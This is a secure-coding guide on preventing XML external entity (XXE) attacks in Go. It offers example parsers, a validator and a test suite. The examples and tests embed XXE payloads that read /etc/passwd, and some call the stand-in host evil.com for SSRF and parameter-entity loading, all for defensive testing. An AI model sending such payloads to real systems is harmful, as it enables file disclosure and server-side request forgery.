🔵Info0.0

Go XXE Prevention

Complete guide to preventing XXE vulnerabilities in Go applications using encoding/xml and other XML libraries.

CWE-611: Improper Restriction of XML External Entity ReferenceOWASP Top 10:2021 - A05: Security Misconfiguration

Overview

Go's standard library encoding/xml package is safe from XXE by default. It does not support external entities or DTD processing, making it inherently secure against XXE attacks.

Go XML Libraries:

encoding/xml (standard library) - Safe by default, no external entity support
libxml2 bindings (third-party) - May be vulnerable if not configured properly
etree (third-party) - Safe, no external entity support
xmlquery (third-party) - Built on encoding/xml, inherits safety

Security Status:

encoding/xml - SAFE (no external entity support)
Most third-party libraries - SAFE (pure Go implementations)
CGO bindings to libxml2/expat - CHECK CAREFULLY

Best Practice: Use Go's standard encoding/xml package. If using CGO bindings to C libraries, verify external entity handling is disabled.

encoding/xml (Safe by Default)

Standard Library Safety: Go's encoding/xml package does NOT support:

External entities (SYSTEM or PUBLIC)
DTD processing
Entity expansion beyond predefined entities (< > & " ')

What This Means:

XXE payloads will NOT work
External entity declarations are ignored
No file disclosure via XML
No SSRF via XML
No billion laughs attacks via entities

Predefined Entities Only: The standard library only expands the 5 predefined XML entities:

&lt;   →  <
&gt;   →  >
&amp;  →  &
&quot; →  "
&apos; →  '

Any custom entities (internal or external) are ignored or cause parse errors.

encoding/xml Secure Usage

Gomain.go✓ Secure
package main

import (
	"encoding/xml"
	"fmt"
	"io"
	"net/http"
)

// Define your XML structure
type Message struct {
	XMLName xml.Name `xml:"root"`
	Data    string   `xml:"data"`
	Value   int      `xml:"value"`
}

// SECURE: Standard parsing with encoding/xml
func parseXMLSecure(xmlData []byte) (*Message, error) {
	var msg Message
	
	// This is safe - external entities ignored
	err := xml.Unmarshal(xmlData, &msg)
	if err != nil {
		return nil, fmt.Errorf("invalid XML: %w", err)
	}
	
	return &msg, nil
}

// SECURE: HTTP handler with input validation
func xmlHandler(w http.ResponseWriter, r *http.Request) {
	// Validate content type
	if r.Header.Get("Content-Type") != "application/xml" {
		http.Error(w, "Invalid content type", http.StatusUnsupportedMediaType)
		return
	}
	
	// Limit request body size (1MB)
	maxSize := int64(1048576)
	r.Body = http.MaxBytesReader(w, r.Body, maxSize)
	
	// Read body
	xmlData, err := io.ReadAll(r.Body)
	if err != nil {
		http.Error(w, "Request too large", http.StatusRequestEntityTooLarge)
		return
	}
	defer r.Body.Close()
	
	// Parse XML (safe from XXE)
	msg, err := parseXMLSecure(xmlData)
	if err != nil {
		http.Error(w, "Invalid XML", http.StatusBadRequest)
		return
	}
	
	// Process message
	fmt.Fprintf(w, "Processed: %s\n", msg.Data)
}

func main() {
	http.HandleFunc("/api/xml", xmlHandler)
	fmt.Println("Server starting on :8080")
	http.ListenAndServe(":8080", nil)
}

Using xml.Decoder for Streaming

Godecoder_example.go✓ Secure
package main

import (
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// SECURE: Streaming XML parsing with xml.Decoder
func parseXMLStream(xmlReader io.Reader) error {
	// Create decoder from reader
	decoder := xml.NewDecoder(xmlReader)
	
	// Decoder is safe - does not expand external entities
	// Even if XML contains <!DOCTYPE> with entities, they're ignored
	
	for {
		// Read next token
		token, err := decoder.Token()
		if err == io.EOF {
			break
		}
		if err != nil {
			return fmt.Errorf("parse error: %w", err)
		}
		
		// Process token based on type
		switch elem := token.(type) {
		case xml.StartElement:
			fmt.Printf("Start element: %s\n", elem.Name.Local)
			
		case xml.EndElement:
			fmt.Printf("End element: %s\n", elem.Name.Local)
			
		case xml.CharData:
			fmt.Printf("Character data: %s\n", string(elem))
		}
	}
	
	return nil
}

// Example with XXE attempt (will be safely ignored)
func exampleXXEAttempt() {
	xxePayload := `<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>`
	
	reader := strings.NewReader(xxePayload)
	
	// This is SAFE - the &xxe; entity will NOT be expanded
	// encoding/xml ignores external entity declarations
	err := parseXMLStream(reader)
	if err != nil {
		fmt.Printf("Error: %v\n", err)
	}
	
	// The &xxe; reference will either:
	// 1. Be left as literal "&xxe;"
	// 2. Cause a parse error (entity not defined)
	// It will NOT read /etc/passwd
}

Input Validation and Sanitization

Govalidator.go✓ Secure
package main

import (
	"bytes"
	"encoding/xml"
	"errors"
	"fmt"
	"regexp"
)

// XMLValidator provides input validation for XML
type XMLValidator struct {
	MaxSize          int64
	AllowDOCTYPE     bool
	AllowedRootNames []string
}

// NewXMLValidator creates validator with secure defaults
func NewXMLValidator() *XMLValidator {
	return &XMLValidator{
		MaxSize:      1048576, // 1MB
		AllowDOCTYPE: false,   // Reject DOCTYPE by default
	}
}

// Validate checks XML before parsing
func (v *XMLValidator) Validate(xmlData []byte) error {
	// Size check
	if int64(len(xmlData)) > v.MaxSize {
		return fmt.Errorf("XML exceeds maximum size of %d bytes", v.MaxSize)
	}
	
	// DOCTYPE check (defense in depth)
	if !v.AllowDOCTYPE {
		doctypeRegex := regexp.MustCompile(`(?i)<!DOCTYPE`)
		if doctypeRegex.Match(xmlData) {
			return errors.New("DOCTYPE declarations not allowed")
		}
	}
	
	// ENTITY check (additional safety, though encoding/xml ignores them)
	entityRegex := regexp.MustCompile(`(?i)<!ENTITY`)
	if entityRegex.Match(xmlData) {
		return errors.New("ENTITY declarations not allowed")
	}
	
	return nil
}

// ParseSafe validates and parses XML
func (v *XMLValidator) ParseSafe(xmlData []byte, target interface{}) error {
	// Validate first
	if err := v.Validate(xmlData); err != nil {
		return fmt.Errorf("validation failed: %w", err)
	}
	
	// Parse (safe due to encoding/xml)
	if err := xml.Unmarshal(xmlData, target); err != nil {
		return fmt.Errorf("parse failed: %w", err)
	}
	
	return nil
}

// Example usage
type Config struct {
	XMLName xml.Name `xml:"config"`
	Name    string   `xml:"name"`
	Value   string   `xml:"value"`
}

func main() {
	validator := NewXMLValidator()
	
	xmlData := []byte(`<?xml version="1.0"?>
<config>
  <name>test</name>
  <value>123</value>
</config>`)
	
	var config Config
	if err := validator.ParseSafe(xmlData, &config); err != nil {
		fmt.Printf("Error: %v\n", err)
		return
	}
	
	fmt.Printf("Config: %+v\n", config)
}

Third-Party XML Libraries

Popular Go XML Libraries:

1. encoding/xml (Standard Library)

Status: SAFE
Features: Full XML 1.0 support, no external entities
Use: Default choice for XML parsing

2. github.com/beevik/etree

Status: SAFE
Features: Element tree API, pure Go
Use: When you need DOM-like manipulation

3. github.com/antchfx/xmlquery

Status: SAFE
Features: XPath queries, built on encoding/xml
Use: When you need XPath support

4. CGO Bindings (libxml2, expat)

Status: POTENTIALLY VULNERABLE
Warning: May support external entities
Recommendation: Avoid unless necessary, configure carefully

When Using Third-Party Libraries:

Verify they don't use CGO to call C libraries
Check documentation for entity handling
Review source code for external entity support
Test with XXE payloads

beevik/etree Secure Usage

Goetree_example.go✓ Secure
package main

import (
	"fmt"
	"strings"
	
	"github.com/beevik/etree"
)

// SECURE: etree library (pure Go, no external entities)
func parseWithEtree(xmlData string) error {
	// Create document
	doc := etree.NewDocument()
	
	// Parse XML (safe - etree doesn't support external entities)
	if err := doc.ReadFromString(xmlData); err != nil {
		return fmt.Errorf("parse error: %w", err)
	}
	
	// Navigate and extract data
	root := doc.SelectElement("root")
	if root == nil {
		return fmt.Errorf("root element not found")
	}
	
	// Find elements using XPath-like syntax
	for _, elem := range root.SelectElements("data") {
		fmt.Printf("Data: %s\n", elem.Text())
	}
	
	return nil
}

// Example with XXE attempt (safely ignored)
func exampleEtreeXXE() {
	xxePayload := `<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>`
	
	// This is SAFE - etree will ignore the external entity
	err := parseWithEtree(xxePayload)
	if err != nil {
		fmt.Printf("Error: %v\n", err)
		return
	}
	
	// The &xxe; entity will NOT be expanded
}

func main() {
	// Safe XML example
	safeXML := `<?xml version="1.0"?>
<root>
  <data>Hello World</data>
</root>`
	
	if err := parseWithEtree(safeXML); err != nil {
		fmt.Printf("Error: %v\n", err)
	}
}

Gin Framework XML Handling

Gogin_xml.go✓ Secure
package main

import (
	"net/http"
	
	"github.com/gin-gonic/gin"
)

// Request structure
type XMLRequest struct {
	Name  string `xml:"name" binding:"required"`
	Email string `xml:"email" binding:"required,email"`
	Age   int    `xml:"age" binding:"required,min=1,max=120"`
}

// Response structure
type XMLResponse struct {
	Status  string `xml:"status"`
	Message string `xml:"message"`
}

func main() {
	router := gin.Default()
	
	// Middleware to limit request size
	router.Use(func(c *gin.Context) {
		c.Request.Body = http.MaxBytesReader(c.Writer, c.Request.Body, 1048576) // 1MB
		c.Next()
	})
	
	// SECURE: Gin uses encoding/xml by default
	router.POST("/api/xml", func(c *gin.Context) {
		var req XMLRequest
		
		// BindXML uses encoding/xml (safe from XXE)
		if err := c.BindXML(&req); err != nil {
			c.XML(http.StatusBadRequest, XMLResponse{
				Status:  "error",
				Message: "Invalid XML",
			})
			return
		}
		
		// Process request
		c.XML(http.StatusOK, XMLResponse{
			Status:  "success",
			Message: "Processed XML for " + req.Name,
		})
	})
	
	router.Run(":8080")
}

// Custom middleware for additional XML validation
func XMLValidationMiddleware() gin.HandlerFunc {
	return func(c *gin.Context) {
		// Check Content-Type
		if c.ContentType() != "application/xml" {
			c.AbortWithStatusJSON(http.StatusUnsupportedMediaType, gin.H{
				"error": "Content-Type must be application/xml",
			})
			return
		}
		
		c.Next()
	}
}

Testing XXE Prevention

Goxxe_test.go✓ Secure
package main

import (
	"encoding/xml"
	"strings"
	"testing"
)

type TestMessage struct {
	XMLName xml.Name `xml:"root"`
	Data    string   `xml:"data"`
}

// Test that XXE payloads are NOT expanded
func TestXXEPrevention(t *testing.T) {
	tests := []struct {
		name    string
		payload string
	}{
		{
			name: "External entity file disclosure",
			payload: `<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>`,
		},
		{
			name: "External entity SSRF",
			payload: `<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://evil.com/xxe">
]>
<root>
  <data>&xxe;</data>
</root>`,
		},
		{
			name: "Parameter entity",
			payload: `<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">
  %xxe;
]>
<root>
  <data>test</data>
</root>`,
		},
	}
	
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			var msg TestMessage
			
			// Attempt to parse XXE payload
			err := xml.Unmarshal([]byte(tt.payload), &msg)
			
			// Either parse succeeds with entity NOT expanded
			// OR parse fails (both are acceptable)
			if err == nil {
				// Verify no file contents or SSRF data in result
				if strings.Contains(msg.Data, "root:") ||
					strings.Contains(msg.Data, "http") {
					t.Errorf("XXE payload was expanded! Got: %s", msg.Data)
				}
				t.Logf("Parse succeeded, entity not expanded: %s", msg.Data)
			} else {
				t.Logf("Parse failed (acceptable): %v", err)
			}
		})
	}
}

// Test that valid XML is parsed correctly
func TestValidXMLParsing(t *testing.T) {
	validXML := `<?xml version="1.0"?>
<root>
  <data>Hello World</data>
</root>`
	
	var msg TestMessage
	err := xml.Unmarshal([]byte(validXML), &msg)
	
	if err != nil {
		t.Errorf("Valid XML failed to parse: %v", err)
	}
	
	if msg.Data != "Hello World" {
		t.Errorf("Expected 'Hello World', got '%s'", msg.Data)
	}
}

Go XML Security Best Practices

Best Practices for Go XML Security:

1. Use Standard Library ☐ Prefer encoding/xml over third-party libraries ☐ Inherently safe from XXE ☐ Well-tested and maintained

2. Input Validation ☐ Validate Content-Type header ☐ Enforce size limits (use http.MaxBytesReader) ☐ Reject DOCTYPE declarations (defense in depth) ☐ Validate against expected schema

3. Error Handling ☐ Don't expose parse errors to users ☐ Log errors internally with details ☐ Return generic error messages ☐ Monitor for XXE attempt patterns

4. Third-Party Libraries ☐ Verify no CGO usage (pure Go preferred) ☐ Review for external entity support ☐ Test with XXE payloads ☐ Keep dependencies updated

5. Testing ☐ Include XXE payloads in security tests ☐ Verify entities not expanded ☐ Test with various attack vectors ☐ Automate security testing in CI/CD

6. Monitoring ☐ Log all XML parsing operations ☐ Alert on suspicious patterns (DOCTYPE, ENTITY) ☐ Monitor for parse errors ☐ Track XML endpoint usage

Go XXE Prevention Checklist

☐ Use encoding/xml from standard library • Avoid third-party XML libraries unless necessary • Verify third-party libraries are pure Go

☐ Validate input before parsing • Check Content-Type header • Enforce size limits (1MB default) • Reject DOCTYPE if not needed • Reject ENTITY declarations

☐ Use http.MaxBytesReader • Limit request body size • Prevent DoS via large XML • Apply to all XML endpoints

☐ Implement proper error handling • Don't expose parse errors • Log errors with request context • Return generic error messages

☐ Test XXE prevention • Include XXE tests in test suite • Test all XML parsing code paths • Verify entities not expanded • Test with actual attack payloads

☐ Keep dependencies updated • Run go get -u regularly • Monitor security advisories • Use go mod tidy to clean up

☐ Review code for XML parsing • Audit all xml.Unmarshal calls • Verify no unsafe third-party libs • Check for CGO XML bindings

☐ Monitor and log • Log all XML parsing attempts • Alert on suspicious patterns • Track parsing errors